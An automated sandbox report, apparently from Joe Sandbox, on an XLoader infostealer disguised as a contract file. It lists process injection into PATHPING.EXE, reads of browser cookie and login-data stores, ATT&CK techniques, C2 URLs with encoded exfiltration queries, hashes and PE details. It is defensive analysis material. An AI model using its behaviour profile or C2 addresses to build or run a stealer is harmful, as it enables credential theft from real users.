                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Users\user\Desktop\draft contract for order #782334.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\PATHPING.EXE, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph (ID: 1546621, Sample: draft contract for order #7..., Startdate: 01/11/2024, Architecture: WINDOWS, Score: 100)
                Process chain shown in the graph: draft contract for order #782334.exe (started) -> draft contract for order #782334.exe (started) -> RprkEKYwQARXc.exe (injected) -> PATHPING.EXE (started) -> RprkEKYwQARXc.exe (injected) and firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                draft contract for order #782334.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.XLoader |
                draft contract for order #782334.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                                              unknown
                                                                                              http://www.dbasky.net/qgza/false
                                                                                                unknown
                                                                                                http://www.cmdh1c.xyz/6byd/?sn0PLN=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&xZa=jpgDOVH8PXW8oBA0true
                                                                                                  unknown
                                                                                                  http://www.cmdh1c.xyz/6byd/true
                                                                                                    unknown
                                                                                                    http://www.44kdd.top/wh1i/true
                                                                                                      unknown
                                                                                                      http://www.broork.sbs/51fd/?sn0PLN=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&xZa=jpgDOVH8PXW8oBA0true
                                                                                                        unknown
                                                                                                        http://www.suree.bet/mgme/true
                                                                                                          unknown
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546621
Start date and time: 2024-11-01 09:16:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: draft contract for order #782334.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 131
• Number of non-executed functions: 271
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target RprkEKYwQARXc.exe, PID 4444 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • VT rate limit hit for: draft contract for order #782334.exe
Time | Type | Description
04:17:00 | API Interceptor | 1x Sleep call for process: draft contract for order #782334.exe modified
04:18:13 | API Interceptor | 8880922x Sleep call for process: PATHPING.EXE modified
                                                                                                                      Process:C:\Users\user\Desktop\draft contract for order #782334.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                      Malicious:true
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                      Process:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.956241236145516
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      File name:draft contract for order #782334.exe
                                                                                                                      File size:751'104 bytes
                                                                                                                      MD5:dab7306baf4c0e52d2357f48b7a12911
                                                                                                                      SHA1:52c04bd5512ba50072c4169bd6bf54af7b3557ee
                                                                                                                      SHA256:c55ad029c3701a693dd7bebefc90a13766f75972819faacc93fd1b57039f26b6
                                                                                                                      SHA512:609334705b4f3f4b23b98bbe1d11717ac8781d53f3a997ac4ea403b9c060d456e67691dacd92fc816ad1cea5ae6aff62ebe3c969806505ebcc3d018c4c50b952
                                                                                                                      SSDEEP:12288:lxaDPw1Qk89TmyN9PEeXMYTpoOcEPKtslLrY/dLpE/eGy9A97tMQmLqeE4E:loLw9gTFNNz8YdoOcEPKilLrY/pEy9bx
                                                                                                                      TLSH:9EF4224073A85F11D97A67BEA7E010CC57F47952AE66F3AC1ED6A0CE2AA37010B74D07
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0..j............... ........@.. ....................................@................................
                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                      Entrypoint:0x4b88f6
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x6721D91B [Wed Oct 30 06:58:35 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb88a2 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x624 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb6124 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb68fc | 0xb6a00 | f878d026b15d5d42fb8097f4a7a10219 | False | 0.9624494674024641 | data | 7.963186264062305 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xba000 | 0x624 | 0x800 | b3329aa18924ab1f220f2a87c5fd8a25 | False | 0.33642578125 | data | 3.4494780425708464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbc000 | 0xc | 0x200 | b6f705f12f7b0a123e886d2fd2fbf637 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xba090 | 0x394 | OpenPGP Secret Key | | | 0.4192139737991266
RT_MANIFEST | 0xba434 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T09:17:16.126422+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49735 | TCP
2024-11-01T09:17:45.079358+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 62632 | TCP
